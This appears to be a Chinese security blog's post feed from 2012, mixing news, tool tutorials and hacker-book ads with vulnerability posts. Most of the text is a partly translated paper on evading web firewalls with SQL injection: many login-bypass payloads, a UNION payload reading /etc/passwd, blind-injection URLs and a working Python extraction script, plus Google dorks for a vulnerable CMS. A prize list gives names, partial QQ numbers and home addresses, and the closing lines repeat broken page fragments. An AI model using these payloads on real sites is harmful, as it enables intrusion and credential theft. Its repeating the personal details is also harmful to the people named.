YesCK's Blog

IE主页被篡改的修复方法之一

Wed, 11 Jan 2012 02:00:17 +0000

      自己的IE9被别的导航网站篡改了，我身为信息安全爱好者，当然是不能容忍的。
      我的系统是Win7 64Bit，如别的系统差异也不大。
      cmd进入gpedit.msc下的用户配置-管理模板-Windows组件-interent explorer 在右面找到“禁止更改主页设置” 点已启用下面输入你要的主页。点击确定即可。


Tags - ie主页被窜该 , ie修复

dnsenum的使用

Fri, 06 Jan 2012 20:02:07 +0000

关于 DNSEnum：
DNSEnum 是一款非常强大的域名信息收集脚本它是由参与backtrack 开发项目的程序员所设计，这位名叫 Fillp (barbsie) Waeythens 的开发者是一个精通web渗透测试的安全人员，并对DNS信息收集有着非常丰富的经验。

在ubuntu 下由于缺少一些perl模块会报错

使用前需要安装一些perl 模块
操作如下：
sudo perl -MCPAN -e shell
cpan[1]> install Net::IP
cpan[1]> install Net::DNS
cpan[1]> install Net::Netmask
cpan[1]> install XML::Writer

DNSEnum 的基本使用

seclab@seclab:/opt/tools/dnsenum$ ./dnsenum.pl –enum r1ng.org
dnsenum.pl VERSION:1.2.2
Warning: can’t load Net::Whois::IP module, whois queries disabled.
Warning: can’t load WWW::Mechanize module, Google scraping desabled.
—–   r1ng.org   —–
Host’s addresses:
__________________
r1ng.org                                 600      IN    A        114.66.2.236
Name Servers:
______________
dns23.hichina.com                        551      IN    A        119.145.145.249
dns23.hichina.com                        551      IN    A        218.30.103.243
dns23.hichina.com                        551      IN    A        218.244.147.253
dns23.hichina.com                        551      IN    A        222.73.40.39
dns24.hichina.com                        8        IN    A        119.145.145.250
dns24.hichina.com                        8        IN    A        218.30.103.246
dns24.hichina.com                        8        IN    A        218.244.147.254
dns24.hichina.com                        8        IN    A        222.73.40.40

Mail (MX) Servers:
___________________
mxbiz2.qq.com                            711      IN    CNAME
mx2.qq.com                               82       IN    A        112.90.141.252
mx2.qq.com                               82       IN    A        112.90.142.53
mx2.qq.com                               82       IN    A        112.90.142.54
mx2.qq.com                               82       IN    A        112.90.142.55
mx2.qq.com                               82       IN    A        112.90.142.56
mx2.qq.com                               82       IN    A        112.90.142.115
mx2.qq.com                               82       IN    A        112.90.142.116
mx2.qq.com                               82       IN    A        112.95.240.190
mx2.qq.com                               82       IN    A        112.95.240.191
mx2.qq.com                               82       IN    A        112.95.240.192
mx2.qq.com                               82       IN    A        112.95.240.193
mx2.qq.com                               82       IN    A        112.95.241.32
mx2.qq.com                               82       IN    A        112.95.241.33
mx2.qq.com                               82       IN    A        112.90.139.247
mx2.qq.com                               82       IN    A        112.90.140.86
mx2.qq.com                               82       IN    A        112.90.141.240
mxbiz1.qq.com                            13952    IN    CNAME
mx1.qq.com                               436      IN    A        112.95.240.190
mx1.qq.com                               436      IN    A        112.95.240.191
mx1.qq.com                               436      IN    A        112.95.240.192
mx1.qq.com                               436      IN    A        112.95.240.193
mx1.qq.com                               436      IN    A        112.95.241.32
mx1.qq.com                               436      IN    A        112.95.241.33
mx1.qq.com                               436      IN    A        112.90.139.247
mx1.qq.com                               436      IN    A        112.90.140.86
mx1.qq.com                               436      IN    A        112.90.141.240
mx1.qq.com                               436      IN    A        112.90.141.252
mx1.qq.com                               436      IN    A        112.90.142.53
mx1.qq.com                               436      IN    A        112.90.142.54
mx1.qq.com                               436      IN    A        112.90.142.55
mx1.qq.com                               436      IN    A        112.90.142.56
mx1.qq.com                               436      IN    A        112.90.142.115
mx1.qq.com                               436      IN    A        112.90.142.116

Trying Zone Transfers and getting Bind Versions:
________________________________________________
Trying Zone Transfer for r1ng.org on dns23.hichina.com …
AXFR record query failed: NOERROR

dns23.hichina.com Bind Version: I don’t know too.

Trying Zone Transfer for r1ng.org on dns24.hichina.com …
AXFR record query failed: NOERROR

dns24.hichina.com Bind Version: I don’t know too.

brute force file not specified, bay.

参数解释: –enum 后面跟进行DNS评估的目标域名
全部主机A记录，MX 邮件服务器都通过伪造区域传输的方式被获取

详情请参阅 README.txt
Tags - dnsdnum , dnsenum使用 , dnsenum用法

GoDaddy因支持SOPA遭遇抵制

Sat, 31 Dec 2011 03:26:48 +0000

　　在任天堂、索尼和EA重新考虑是否支持SOPA的是时候，很大的因素是因为Goaddy的事件，所引起的。下面是关于Godaddy的事件。
数以千计的网站所有者，包括维基百科，已经呼吁网站所有者抵制GoDaddy，因为GoDaddy之前支持有争议的反盗版法律－SOPA（停止互联网盗版行动）。
　　GoDaddy是世界上最大的托管服务商，它最初支持SOPA法案，但基于用户和其他公司的压力，GoDaddy后来开始改变支持态度。许多高知名度的互联网公司，包括谷歌，Facebook，雅虎和eBay，坚决反对该法案，理由是担心它会导致广泛的互联网审查。
　　签名抵制GoDaddy的风潮还在继续，GoDaddy已在两天时间内失去37000多个域名和网站托管。现在，GoDaddy希望提供服务价格折扣，来降低域名和网站移出速度。
　　那些从GoDaddy的撤出的网站包括维基百科，Lolcats，Cheezburger和图片托管服务商Imgur。
　　GoDaddy首席执行官表示，打击网上盗版至关重要，这就是为什么GoDaddy一直致力于帮助修订这条法律 - 但我们清楚这项法律本可以修订的更好。
　　GoDaddy先前失去了众多用户，因为其创始人和前首席执行官鲍勃帕森斯发表了他在津巴布韦度假时候杀死一头大象的视频。
Tags - godaddy事件 , sopa , godaddy

DIY-CMS blog mod SQL Injection 漏洞

Fri, 30 Dec 2011 02:10:40 +0000

SQL Injection:
DORK:
inurl:"mod.php?mod=blog" intext:"powered by DIY-CMS"
inurl:"mod.php?mod=blog"

BUG:
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=tags&tag=features&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=8&year=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=list&catid=4&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=archive&month=8&year=2&start=[sqli]
http://127.0.0.1/diy-cms/mod.php?mod=blog&modfile=viewpost&blogid=26&start=[sqli]

Why?:
The variables $start, $year, $month are not filtered
In file: /modules/blog/tags.php , list.php , index.php ,
main_index.php , viewpost.php

$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];

In file: /modules/blog/archive.php

$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];
    $month =(!isset($_GET['month'])) ?
error_msg($lang['ARCHIVE_NO_MONTH_SPECIFIED']) : $_GET['month'];
    $year =(!isset($_GET['year'])) ?
error_msg($lang['ARCHIVE_NO_YEAR_SPECIFIED']) : $_GET['year'];

In file: /modules/blog/control/approve_comments.php ,
approve_posts.php , viewcat.php

$start =(!isset($_GET['start'])) ? '0' : $_GET['start'];

Tags - diy-cms注入 , diycms漏洞 , powered , by , diy-cms

Winn Guestbook v2.4.8c Stored XSS漏洞

Fri, 30 Dec 2011 02:03:01 +0000

# Exploit Title: Winn Guestbook v2.4.8c Stored XSS
# Date: 12/29/11
# Author: G13
# Software Link: http://code.google.com/p/winn-guestbook/,
http://www.winn.ws
# Version: 2.4.8c
# Category: webapps (php)
# CVE: 2011-5026
##### Vulnerability #####
There is no sanitation on the input of the name variable. This allows
malicious scripts to be added. This is a stored XSS.
##### Vendor Notification #####
12/24/11 - Vendor Notified.
12/27/11 - Vendor Acknowledged, Patch Issued.
##### Resolution #####
Upgrade to Version 2.4.8d
##### Affected Variables #####
name=[XSS]
##### Exploit #####
The script can be added right in the page, there is no filtering of
input. This can easily be exploited if the email address used is added
to the "approved posters" list.

Tags - xss , xss漏洞exploit中文 , winn , guestbook漏洞

maebo 0.5.6不能中文 N900

Mon, 26 Dec 2011 09:47:57 +0000

安装maebo
1.root
2.apt-get update
3.apt-get install maebo

关于不能输入中文的：
1：先装google拼音，已装的跳过
2：安装mscim-bridge-client-qt4
3：重启就可以用了
4：还是不行的看看mscim-bridge-agent和mscim-bridge-client-gtk装了没有，有就看下一步
5：打开“控制面板”“MSCIM输入法配置”在“启用GooglePingyin”重新勾选（取消后再勾上），保存，重启
Tags - maebo , n900n900中文

《玩转QQ5》——2012，我们来了。3+1重连环大奖等你来拿

Mon, 26 Dec 2011 07:49:43 +0000

《玩转QQ5》让这个寒假不太冷。600元超值大奖等你来拿。

龙年回执贺新禧，3+1项连环大奖欢乐颂。

特别Q粉大奖：奖励1年（QQ会员红黄蓝绿超级QQ 短信QQ 一次尽享600元增值业务）

穿越火线VIP特权，DNF闪耀黑钻，非安全专属T恤，更有666名开钻平台资格等你来拿……

新游戏章节揭秘DNF地下城洗号内幕，穿越火线CF新奇玩法。黄钻非黄钻共同玩转免费QCC，DNF道具百分百囊中收入，空间炫技QQ酷玩全聚得……

你的寒假，我来买单。

玩转QQ5封面

玩转QQ5宣传海报

非安全淘宝店订购：http://item.taobao.com/item.htm?spm=1101_RPC.1-7s8cb.4-3sztgu&id=14969904953

非安全在线商城订购：http://book.nohack.me/goods-85.html

《玩转QQ系列经典合辑》回执获奖名单

大奖一获奖名单

一等奖：1名，奖励16G U盘1枚。
获奖者：
          李宇波  QQ：691794xxx     陕西省宝鸡市宝鸡中学13届

二等奖：2名，奖励8G U盘2枚。
获奖者：
        1）罗步宽  QQ：10561xxx   江苏省铜山县郑集中学城区校区
        2）刘  晨  QQ：1207953xxx   陕西省西安市长安区韦曲广场南路
三等奖：3名，奖励4G U盘。
获奖者：
        1）金  鑫  QQ：94615xxx  南通市海安县李堡镇镇南中路
        2）李二焱  QQ：275514xxx  河北省石家庄市元氏县
        3）李京涛  QQ：1873775xxx  河北省河间市果子洼乡柳林村

大奖二获奖名单

凡是前500名回执卡者，均获得了以下任选其一的三个奖项，1、开通开钻平台帐户权限；2、赠送靓号资源；3、添加其为好友／看私密日志／QQ秀免费合影等。

获奖者：王炳淇杜锦博解浩田陈宇扬子沛刘晨徐铭佳李宇波吴天昊赵毅堃罗步宽徐誉崔宇童魏政李京涛李二焱张文和赵哲辰金鑫……

（注意：大奖一和大奖二的获奖者有重复，因为《经典合辑》的回执规则就是一张回执就有机会赢取双重大奖。真是实惠多多，拿奖拿到手软啊。所以还在犹豫不决你，赶紧拿起笔或者敲打键盘吧，填写回执，赢取QQ5的N重龙年大奖）

更对关于 QQ黑客的信息请点击：
曝光《QQ黑客5》封面  玩转QQ黑客系列之五本站首发
《玩转QQ系列经典合辑》再度袭来，500名大奖等你来拿，至于你买不买，反正老子又买了
Tags - qq黑客 , 非安全 , 黑手 , 黑手qq黑客 , 玩转qq黑客

明年2月ipad3!?

Sun, 25 Dec 2011 02:24:55 +0000

    传苹果将在明年2月乔布斯生日之际推iPad 3

      iPad 3假想图
    北京时间12月25日消息，据国外媒体报道，最新的一些传闻称，苹果正准备在明年2月24日——史蒂夫·乔布斯(Steve Jobs)诞辰纪念日之际推出新一代平板电脑iPad 3。
    据称，这一传闻的消息源来自苹果在中国台湾地区的供应商，正是这些供应商向台湾当地的媒体透露了这一消息，才致使上述传闻得以散布开来。
    另外一点值得注意的是，明年2月24日将是星期五。通常苹果喜欢在星期五这一天推出新设备。
    当然，目前这一消息还只是传闻而已，尽管如此，这一消息还是与其它媒体报道的苹果计划在明年2月推出iPad 3之消息相吻合。如果这一消息属实，预计苹果将可能会在明年2月中旬正式公布的相关的消息。
Tags - ipad , ipad3 , 乔布斯 , 2月24

曝光《QQ黑客5》封面玩转QQ黑客系列之五本站首发

Fri, 23 Dec 2011 07:22:52 +0000

      刚刚获得消息，玩转QQ黑客系列之五——《QQ黑客5》目前已经出版，但是，非安全官方网站还没放出，我获得此信息后，马上放出给大家分享！让大家先读为快！
     非安全自玩转QQ黑客系列推出一来，收到了广大黑客爱好者的好评，各地都掀起了购买《玩转QQ黑客系列》的高潮。无论是大牛还是小菜，几乎人人都有，很多小菜购买后如获至宝学到了很多的东西，一直是非安全玩转QQ黑客系列购买者的中流砥柱，很多人买了整套的《玩转QQ黑客系列》，很多人为此成为了非安全的忠实Fans.
     由于技术的更新很快，很多小技巧或者方法容易失效，但是非安全的更新速度更是给力不断推出新的图书，提供了更多的技术、多好的方法、跟深入的探索，让很多小菜感受到了黑客技术的魅力，从而开始了更为认真和深入的学习，甚至还有一些想靠黑客技术赚钱的人，也改变了初衷，从网络犯罪前，悬崖勒马！他们由衷的感谢非安全，感谢《玩转QQ黑客系列》。
     其实跟多的还是普通的用户，从QQ为引入点，了解了安全，了解技术，更好的使用QQ，而且还能更好的保护自己的隐私。就这次CSDN事件中，就有不少的《玩转QQ黑客系列》的读者避免了密码私人信息的泄漏。
    话不多说了：

更对关于 QQ黑客的信息请点击：
《玩转QQ系列经典合辑》再度袭来，500名大奖等你来拿，至于你买不买，反正老子又买了
Tags - qq黑客 , 玩转qq黑客5 , 玩转qq黑客 , 非安全

False SQL Injection and Advanced Blind SQL Injection[部分翻译]

Fri, 23 Dec 2011 03:30:52 +0000

#####################################################################
# Exploit Title: False SQL injection and advanced blind SQL injection  #
# Date: 21/12/2011              #
# Author: wh1ant              #
# Company: trinitysoft              #
# Group: secuholic              #
#####################################################################
This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution. I
写这个文档是为了宣传先进的sql注入方法关于如何绕过Web防火墙（WAF）或者一些整体的安全解决方案。
did test on a web firewall made in Korean, most SQL injection attack was hit, I will not reveal the maker for cutting its damage.
我在一台韩国生产的web防火墙中测试多种Sql注入工具方式。我不会告诉其厂商减少他的损失。
In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings.
在读完之后整理这个文档，你必须了解基本的Mysql的一些知识。我对“Sql 注入”分为两个含义，
The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in
这首先是笼统的sql注入，我们通常称之为“真SQL注入”，和第二种“假Sql注入”（其实没明白作者的意思，已字面意思来解释。）
this documentation, you can know something special about "True SQL Injection"
虽然在这个文档中，你能了解到一些特别的关于“真SQL注入”。
And I mean to say it's true that my method (False SQL Injection) is different from True/False SQL Injection mentioned in "Blind
我的意思是说这是真的，我的方法（假注射）是从不同的真/假注射中提到盲注
SQL Injection".
A tested environment was as follow.
我的测试环境如下：
ubuntu server  11.04
mysql    5.1.54-1
Apache    2.2.17
PHP    5.3.5-1

A tested code was as follow.
我的测试代码如下：

/*
create database injection_db;
use injection_db;
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));

insert into users values(1, 'admin', 'ad1234');
insert into users values(2, 'wh1ant', 'wh1234');
insert into users values(3, 'secuholic', 'se1234');

*** login.php ***
*/

if(empty($_GET['id']) || empty($_GET['password'])){
  echo "";
  echo "";
  echo "";
  echo "";
  echo "";
}

else{
  $id = $_GET['id'];
  $password = $_GET['password'];

  $dbhost = 'localhost';
  $dbuser = 'root';
  $dbpass = 'pass';
  $database = 'injection_db';

  $db = mysql_connect($dbhost, $dbuser, $dbpass);
  mysql_select_db($database,$db);
  $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error());

  $row = mysql_fetch_array($sql);

  if($row[id] && $row[password]){
    echo "

"."Login sucess"."

";
echo "

"."Hello, "."";
echo "".$row[id]."

";
  }
  else{
    echo "";
  }
  mysql_close($db);
}

?>

First, basic SQL Injection is as follow.
首先。基础的SQL注入如下：
' or 1=1#

The code above is general SQL Injection Code, and this writer classified the code as "True SQL Injection". When you log on to some site, in internal of web program, your id and password are identified by some statement used "select id, password from table where id='' and password='', you can easily understand when you think 0 about character single quotation mark. Empty space is same as 0, the attack is possible using = and 0. As a result, following statement enables log on process.

'=0#

We can apply it in a different way.

This is possible as 0>-1
'>-1#

Also, this is possible as 0<1
'<1#

You don't have to use only single figures. You can use two figures attack as follow.
1'<99#

Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1).

'=0=1#

Additionally there is some possible comparison operation making the same value each other.

'<=>0#

Like this, if you use the comparison operation, you can attack as additional manner.

'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#

In this time, you get the turn on understanding False SQL injection. the following is not attack but operation for MySQL.

mysql> select * from users;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.01 sec)

This shows the contents in any table without any problem.
The following is the content when you don't input any value in the id

mysql> select * from users where id='';
Empty set (0.00 sec)

Of course there is not result because id field dosen't have any string.
In the truth, I have seen the case that in the MySQL if string field has a 0, the result is true. Based on the truth, following statement is true.

mysql> select * from users where id=0;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.00 sec)

If you input 0 in id, All the content is showed. This is the basic about "False SQL Injection". After all, result of 0 makes log on process success. For making the result 0, you need something processing integer, in that time you can use bitwise  operations and arithmetic operations.

Once I'll show bitwise operation example.

Or bitwise operation is well known for any programmer. And as I told you before, '' is 0, if you operate "0 bitwise OR 0", the result is 0. So the following operation succeed log on as the False SQL Injection.
'|0#

Naturally, you can use AND operation.
'&0#

This is the attack using XOR
'^0#

Also using shift operation is enable.
'<<0#
'>>0#

If you apply like those bitwise operations, you can use variable attack methods.
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#

In this time, I will show "False SQL Injection" using arithmetic operations.
If the result is 0 using arithmetic operation with '', attack will be success. The following is the example using arithmetic operation.

'*9#
Multiplication

'/9#
Division.

'%9#
Mod

'+0#
Addition

'-0#
Subtraction

Significant point is that the result has to be under one. Also you can attack as follow.
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#

Next attack is it using fucntion. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with function as much as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided on the last operation after return of function.
''=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
''*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#

Also, you can use attack using space in function name. But you are able to use the space with only some function.
'=upper     (0)#

In this time, SQL keyword is method. This method is also decided as True or False Injection according to case.
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#

Inputting id or password in the field without annotaion is possible about True, False SQL Injection. Normal Web Firewalls filter #, --, /**/, so the method is more effective in the Web Firewalls.
ID  : '='
PASS: '='

ID  : '<>'1
PASS: '<>'1

ID  : '>1='
PASS: '>1='

ID  : 0'='0
PASS: 0'='0

ID  : '<1 and 1>'
PASS: '<1 and 1>'

ID  : '<>ifnull(1,2)='1
PASS: '<>ifnull(1,2)='1

ID  : '=round(0,1)='1
PASS: '=round(0,1)='1

ID  : '*0*'
PASS: '*0*'

ID  : '+'
PASS: '+'

ID  : '-'
PASS: '-'

ID  :'+1-1-'
PASS:'+1-1-'

All attacks used in the documentation will be more effective with using bracket when detouring web firewall.
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#

Let's see normal SQL Injection attack.
' or 1=1#

If this is translated in hexdemical, the result is as follow.
http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234

Like attack above is basically filtered. So that's not good attack, I will try detour filtering using tab(%09) standing in for space(%20). In truth, you can use %a0 on behalf of %09.

The possible values are as follow.
%09
%0a
%0b
%0c
%0d
%a0
%23%0a
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

The following is the example using %a0 instead of %20.
http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234

In this time, I will show "Blind SQL injection" attack, this attack can't detour web firewall filtering, but some attacker tend to think that Blind SQL Injection attack is impossible to log on page. So I decided showing this subject.

The following attack code can be used on log on page. And the page will show id and password.
'union select 1,group_concat(password),3 from users#

This attack code brings /etc/password information.
'union select 1,load_file(0x2f6574632f706173737764),3 from users#

Dare I say it without union select statement using Blind SQL injection with and operation is possible.

The result of record are three.
admin' and (select count(*) from users)=3#

Let's attack detouring web firewall using Blind SQL Injection. The following is vulnerable code to Blind SQL Injection.

  /*** info.php ***/

  $n = $_GET['num'];
  if(empty($n)){
    $n = 1;
  }

  $dbhost = 'localhost';
  $dbuser = 'root';
  $dbpass = 'root';
  $database = 'injection_db';

  $db = mysql_connect($host, $dbuser, $dbpass);
  mysql_select_db($database,$db);
  $sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error());
  $info = @mysql_fetch_row($sql);
  echo "";
  echo "

wh1ant";
echo " site for blind SQL injection test

";
echo "

num: ".$info[0]."

";
echo "

user: ".$info[1]."";
echo "";
mysql_close($db);

?>

Basic Blind SQL Injection is as follow on like above.

http://127.0.0.1/info.php?num=1 and 1=0
http://127.0.0.1/info.php?num=1 and 1=1

But using = operation is possible for Blind SQL Injection.

http://192.168.137.129/info.php?num=1=0
http://192.168.137.129/info.php?num=1=1

Also other operation is possible naturally.

http://127.0.0.1/info.php?num=1<>0
http://127.0.0.1/info.php?num=1<>1

http://127.0.0.1/info.php?num=1<0
http://127.0.0.1/info.php?num=1<1

http://127.0.0.1/info.php?num=1*0*0*1
http://127.0.0.1/info.php?num=1*0*0*0

http://127.0.0.1/info.php?num=1%1%1%0
http://127.0.0.1/info.php?num=1%1%1%1

http://127.0.0.1/info.php?num=1 div 0
http://127.0.0.1/info.php?num=1 div 1

http://127.0.0.1/info.php?num=1 regexp 0
http://127.0.0.1/info.php?num=1 regexp 1

http://127.0.0.1/info.php?num=1^0
http://127.0.0.1/info.php?num=1^1

Attack example:
http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1)
http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1)
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)
http://127.0.0.1/info.php?num=0^(id=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

If I will show all attack, I have to take much time, So I stopped in this time. Blind SQL Injection is difficult manually, So using tool will be more effective. I will show a tool made python, this is an example using ^(XOR) bitwise operation. In order to make the most of detouring the web firewall, I replaced space with %0a.

#!/usr/bin/python

### blind.py ###

import urllib
import sys
import os

def put_data(true_url, true_result, field, index, length):
  for i in range(1, length+1):
    for j in range(32, 127):
      attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j,field,index,i,i)
      attack_open = urllib.urlopen(attack_url)
      attack_result = attack_open.read()
      attack_open.close()

      if attack_result==true_result:
        ch = "%c" % j
        sys.stdout.write(ch)
        break
  print "\t\t",

def get_length(false_url, false_result, field, index):
  i=0
  while 1:
    data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field,index,i)
    data_length_open = urllib.urlopen(data_length_url)
    data_length_result = data_length_open.read()
    data_length_open.close()
    if data_length_result==false_result:
      return i
    i+=1

url = "http://127.0.0.1/info.php"

true_url = url + "?num=1"
true_open = urllib.urlopen(true_url)
true_result = true_open.read()
true_open.close()

false_url = url + "?num=0"
false_open = urllib.urlopen(false_url)
false_result = false_open.read()
false_open.close()

print "num\t\tid\t\tpassword"
fields = "num", "id", "password"

for i in range(1, 4):
  for j in range(0, 3):
    length = get_length(false_url, false_result, fields[j], i)
    length = put_data(false_url, true_result, fields[j], i, length)
  print ""

To its regret, the attack test is stopped for no time, if anyone not this writer studies some attack codes additionally, it will be easy for him to develop the attack.

# Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt

[EOF]
Tags - sql , injection , mysql盲注 , 先进的盲注 , sql注入 , 翻译 , exploit中文

YesCK's Blog

IE主页被篡改的修复方法之一

dnsenum的使用

GoDaddy因支持SOPA遭遇抵制

DIY-CMS blog mod SQL Injection 漏洞

Winn Guestbook v2.4.8c Stored XSS漏洞

maebo 0.5.6不能中文 N900

《玩转QQ5》——2012，我们来了。3+1重连环大奖等你来拿

明年2月ipad3!?

曝光《QQ黑客5》封面玩转QQ黑客系列之五 本站首发

False SQL Injection and Advanced Blind SQL Injection[部分翻译]

ID "; echo "PASS

"."Login sucess"."

"."Hello, ".""; echo "".$row[id]."

wh1ant"; echo " site for blind SQL injection test

num: ".$info[0]."

user: ".$info[1].""; echo ""; mysql_close($db);?>

曝光《QQ黑客5》封面玩转QQ黑客系列之五本站首发

ID
";
echo "PASS

"."Hello, "."";
echo "".$row[id]."

wh1ant";
echo " site for blind SQL injection test

user: ".$info[1]."";
echo "";
mysql_close($db);

?>